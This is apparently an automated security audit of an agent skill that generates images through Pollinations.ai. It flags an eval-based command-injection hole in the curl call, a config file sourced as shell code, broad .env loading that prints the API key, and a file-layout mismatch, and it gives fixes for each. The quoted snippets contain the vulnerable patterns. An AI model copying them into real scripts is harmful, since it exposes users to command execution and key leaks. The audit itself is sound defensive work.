Pollinations Image Generator
WarnAudited by ClawScan on May 10, 2026.
Overview
The skill mostly matches its image-generation purpose, but its shell script can execute unintended commands from options or config files and can expose API keys.
Install only after the script is fixed to remove eval, parse config files safely, mask API keys, and correct the helper-file layout. If you use it, avoid sensitive prompt text and be aware that paid models may consume Pollinations credits.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A crafted filename or option passed through the agent could run local shell commands instead of only downloading an image.
User-controlled values such as filename, dimensions, seed, and output directory are incorporated into a shell command string that is run with eval. Embedded quotes or shell metacharacters could break quoting and execute local commands.
-f|--filename) shift; filename=$1 ;; ... output_path="$OUTPUT_DIR/$(basename "$filename")" ... curl_cmd="curl -sS -L -o \"$output_path\" --max-time 120" ... if ! eval "$curl_cmd"; then
Remove eval and call curl with directly quoted arguments; strictly validate numeric fields and seeds; restrict filenames to safe characters before use.
A file that appears to be simple configuration could execute commands in future sessions.
.user.conf is documented as a preference file, but the script sources it as shell code. If that persistent file is modified or poisoned, commands inside it run whenever the skill runs.
USER_CONF="$SCRIPT_DIR/.user.conf" [ -f "$USER_CONF" ] && . "$USER_CONF"
Parse .user.conf as key/value data instead of sourcing it, and validate allowed keys and values.
An unrelated project API key could be picked up, and a Pollinations API key could appear in the agent transcript or logs.
The skill loads .env files from the parent directory and current working directory, not just a clearly scoped skill-local file, and the config command prints the actual API key when set.
load_env_file "$SCRIPT_DIR/../.env"
load_env_file "$PWD/.env"
API_KEY=${POLLINATIONS_API_KEY:-}
...
echo "API Key: ${API_KEY:+✅ configured}${API_KEY:-❌ not set}"Load only a clearly documented skill-local credential file or declared environment variable, and mask secrets in all output.
The skill may fail to run unless the files are rearranged correctly.
The script expects lib/models.sh, while the supplied file manifest provides models.sh at the root. This looks like a packaging/layout mismatch rather than malicious behavior.
LIB_DIR="$SCRIPT_DIR/lib" # Load model registry . "$LIB_DIR/models.sh"
Package the helper at lib/models.sh or update generate.sh and SKILL.md to match the actual file layout.
Anything included in the prompt is shared with the external provider.
The skill sends the user’s prompt and generation settings to the Pollinations.ai image-generation endpoint, which is expected for this integration.
BASE_URL="https://gen.pollinations.ai" ... api_url="${BASE_URL}/image/${encoded_prompt}?width=${width}&height=${height}&model=${model}"Avoid putting private secrets or sensitive personal information in image prompts, and review the provider’s data handling policies.